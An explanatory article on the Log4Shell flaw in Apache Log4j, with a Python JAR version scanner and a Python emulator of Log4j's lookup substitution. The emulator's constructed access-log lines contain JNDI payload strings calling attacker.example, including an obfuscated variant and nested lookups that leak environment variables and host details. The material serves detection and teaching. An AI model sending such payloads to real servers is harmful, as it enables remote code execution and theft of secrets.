On December 10, 2021, a public exploit was released for a critical vulnerability in Apache Log4j, the widely used Java-based logging library. Tracked as CVE-2021-44228 and nicknamed Log4Shell, the vulnerability affects Log4j 2 versions from 2.0-beta9 through 2.14.1. An attacker who can get a crafted string logged by a vulnerable application gains unauthenticated remote code execution, and from there can deliver malware or collect information. The bug is rated critical because Log4j is embedded in a vast number of enterprise applications and cloud services.
Log4Shell Technical Details
A typical exploit starts with the threat actor setting their Web browser's User-Agent (or any other request field the target is likely to log) to a JNDI lookup string, then sending requests to the target site. The string has the format:
As a result, the string lands in the Web server's access log or in whatever place the application records request data. The bug does not require anyone to read those logs afterwards: it triggers at the moment a vulnerable Log4j instance logs the string, because Log4j's message lookup feature interprets the ${jndi:...} expression and makes the server perform a JNDI lookup against the URL the attacker embedded. That URL points to an attacker-controlled LDAP or RMI server, which either answers with a reference to a remote Java class that the JVM then loads and runs, or carries Base64-encoded commands in its path that the attacker's server turns into the payload it serves. Either way, the result is executed on the compromised device under the privileges of the logging application.
Apache quickly released Log4j 2.15.0 to address the flaw, but a significant number of vulnerable systems will remain unpatched for a long time. The initial fix later proved incomplete and was followed by 2.16.0 and 2.17.0, so the version to upgrade to should be taken from Apache's current advisory. At the same time, threat actors quickly took notice of the Log4Shell zero-day and started scanning for suitable servers to exploit. The infosec community has since tracked numerous attack campaigns employing Log4Shell to deliver a wide range of malware threats.
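A practical first step on any host is to find which log4j-core JARs fall in the affected range. The following Python script is an added example, not code from the original article or from Apache: it reads the version from the Maven pom.properties that log4j-core ships under META-INF, checks whether JndiLookup.class is still present (Apache's early workaround was to delete that class from the JAR), and classifies the JAR against the CVE-2021-44228 range of 2.0-beta9 through 2.14.1. The JARs it runs on are built in memory as constructed test data, so it runs offline; point scan_jar at real files to use it.

```python
"""Classify log4j-core JARs against the CVE-2021-44228 range (2.0-beta9 .. 2.14.1).

Added example, not code from the original article or from Apache. The JARs
built by make_jar() are constructed test data so the script runs offline.
"""
import io
import re
import zipfile

POM_PATH = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(ver):
    """Turn '2.0-beta9', '2.14.1' or '2.15.0' into a comparable tuple.

    alpha/beta/rc tags sort before the final release of the same number, which
    matches how Maven orders these tags."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", ver.strip())
    if not m:
        raise ValueError(f"unrecognised version: {ver!r}")
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    if m.group(4):
        tag = {"alpha": 0, "beta": 1, "rc": 2}[m.group(4)]
        return (major, minor, patch, tag, int(m.group(5)))
    return (major, minor, patch, 3, 0)   # final release sorts after any pre-release


VULN_LOW = parse_version("2.0-beta9")
VULN_HIGH = parse_version("2.14.1")


def log4j_version(jar_bytes):
    """Return (version string or None, whether JndiLookup.class is present)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        names = set(z.namelist())
        has_jndi = JNDI_CLASS in names
        if POM_PATH not in names:
            return None, has_jndi
        for line in z.read(POM_PATH).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip(), has_jndi
    return None, has_jndi


def assess(jar_bytes):
    """'vulnerable', 'mitigated' (in range but JndiLookup removed),
    'not_vulnerable' (outside the CVE-2021-44228 range) or 'unknown'."""
    version, has_jndi = log4j_version(jar_bytes)
    if version is None:
        return "unknown"
    if VULN_LOW <= parse_version(version) <= VULN_HIGH:
        return "vulnerable" if has_jndi else "mitigated"
    return "not_vulnerable"


def scan_jar(path):
    """Assess a JAR on disk."""
    with open(path, "rb") as fh:
        return assess(fh.read())


def make_jar(version, include_jndi=True):
    """Build a minimal log4j-core-like JAR in memory (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PATH, "groupId=org.apache.logging.log4j\n"
                             f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder, not real bytecode
    return buf.getvalue()


if __name__ == "__main__":
    for ver in ("2.0-beta8", "2.0-beta9", "2.14.1", "2.15.0"):
        print(ver, assess(make_jar(ver)))
    print("2.14.1 with JndiLookup removed:", assess(make_jar("2.14.1", include_jndi=False)))
```

Production scanners additionally recurse into nested archives (WAR and EAR files, and shaded "uber" JARs that bundle log4j-core), which this version does not. A shaded JAR can also carry the log4j-core classes without the pom.properties file; the script then reports unknown and the class listing should be checked directly.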
Log4Shell is Used in Cryptominer, Botnet, Backdoor and Data-Collecting Attacks
One of the first threat actors to use Log4Shell in their operations was the group behind the Kinsing crypto-mining botnet. They used Log4Shell to deliver Base64-encoded payloads and run shell scripts whose job is to remove competing crypto-miners from the targeted system before the Kinsing malware itself is executed.
Netlab 360 observed threat actors using the vulnerability to install variants of the Mirai and Muhstik botnets on breached devices. These families enroll infected IoT devices and servers into a botnet that the operators can then direct to launch DDoS (Distributed Denial-of-Service) attacks or to deploy crypto-miners.
According to the Microsoft Threat Intelligence Center, Log4Shell was also used in attack campaigns dropping Cobalt Strike beacons. Cobalt Strike is a legitimate tool for penetration testing against a company's security controls, but its post-exploitation and backdoor capabilities have made it a staple in the arsenal of numerous threat actor groups. The resulting backdoor access to the victim's network is then used to deliver next-stage payloads such as ransomware, info-stealers and other malware.
Log4Shell can also be used to exfiltrate server data without a second-stage payload. Log4j lookups can be nested, so placing expressions such as ${env:USER}, ${hostname} or ${sys:os.name} inside the JNDI URL makes the server resolve them first and send the values to the attacker's host as part of the callback. This way attackers can learn the host name, the OS name and version, the user account under which the application is running, and anything else held in environment variables or system properties, including any secrets stored there.
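The two mechanisms described on this page, the callback triggered when a logged string is formatted and the nested lookups that leak environment data, come from the same substitution step. The following Python model, an added example that is not code from the original article or from Log4j itself, emulates that step for the lookups involved (jndi, env, sys, hostname, lower, upper and the :-default syntax) and runs it over constructed access-log lines, including an obfuscated payload. The log lines, the environment and host details, and the attacker host name attacker.example are all constructed for the example. Run with a dummy context over real access logs, the same resolver doubles as a detector that sees through ${lower:}/${upper:} obfuscation.

```python
"""Emulate Log4j 2's ${...} lookup substitution to show how a logged
User-Agent turns into a JNDI callback, and how nested lookups leak host data.

Added example: a model of the vulnerable behaviour in log4j-core 2.0-beta9 ..
2.14.1 written for illustration, not Log4j's own code. The log lines,
environment and host details below are constructed sample data."""
import re

# Innermost ${...} that contains no further "${" (Log4j resolves inside-out).
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
UNRESOLVED = "\x00"   # stands in for the "$" of a lookup left verbatim

# Constructed stand-in for the server's environment, JVM properties and host name.
CTX = {
    "env": {"USER": "www-data", "AWS_SECRET_ACCESS_KEY": "constructed-secret"},
    "sys": {"os.name": "Linux", "os.version": "5.10.0", "user.name": "www-data"},
    "hostname": "web-01",
}

# Constructed access-log lines; the last field is the User-Agent the attacker set.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example:1389/a}"',
    # Obfuscated form: "jndi" and "ldap" are assembled from ${lower:} lookups,
    # and the path carries the value of an environment variable.
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example:1389/${env:USER}}"',
    '203.0.113.10 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example:1389/${hostname}/${sys:os.name}}"',
]


def evaluate(prefix, arg, ctx, callbacks):
    """Resolve one lookup. Returns None for a lookup this model does not know."""
    prefix = prefix.lower()          # Log4j matches lookup names case-insensitively
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "env":
        return ctx["env"].get(arg)
    if prefix == "sys":
        return ctx["sys"].get(arg)
    if prefix == "hostname":
        return ctx["hostname"]
    if prefix == "jndi":
        # Here real Log4j would connect to the URL and, for a remote class
        # reference, the JVM would load and run the attacker's class. This
        # model only records where the server would have called out to.
        callbacks.append(arg)
        return "<jndi-result>"
    return None


def resolve_lookups(text, ctx, lookups_enabled=True, max_rounds=200):
    """Substitute lookups the way vulnerable Log4j does when formatting a message.

    Returns (resolved_text, callbacks); callbacks holds every JNDI URL the
    logging call would have triggered. With lookups_enabled=False the text is
    left alone, which is the fixed behaviour for message text."""
    callbacks = []
    if not lookups_enabled:
        return text, callbacks
    for _ in range(max_rounds):
        m = LOOKUP_RE.search(text)
        if m is None:
            break
        key, has_default, default = m.group(1).partition(":-")   # ${name:arg:-default}
        prefix, _, arg = key.partition(":")
        value = evaluate(prefix, arg, ctx, callbacks)
        if value is None:
            # Unknown or empty lookup: use the default if given, else leave it verbatim.
            value = default if has_default else UNRESOLVED + m.group(0)[1:]
        text = text[: m.start()] + value + text[m.end():]
    return text.replace(UNRESOLVED, "$"), callbacks


def scan_access_log(lines, ctx, lookups_enabled=True):
    """Feed each line through the emulated substitution and report the callbacks."""
    findings = []
    for line in lines:
        _, callbacks = resolve_lookups(line, ctx, lookups_enabled)
        findings.extend({"line": line, "callback": url} for url in callbacks)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG, CTX):
        print("callback ->", f["callback"])
    print("with lookups disabled:", scan_access_log(SAMPLE_LOG, CTX, lookups_enabled=False))
```

The obfuscated line resolves to a callback to ldap://attacker.example:1389/www-data, so the environment variable leaves the host in the very request that triggers the bug; no payload needs to run for that. Real Log4j offers more lookups than modelled here (ctx, date, java and others), and disabling message lookups alone was not the end of the story: 2.15.0 still resolved lookups in some pattern-layout contexts (CVE-2021-45046), which is why upgrading to a current release matters more than toggling the flag.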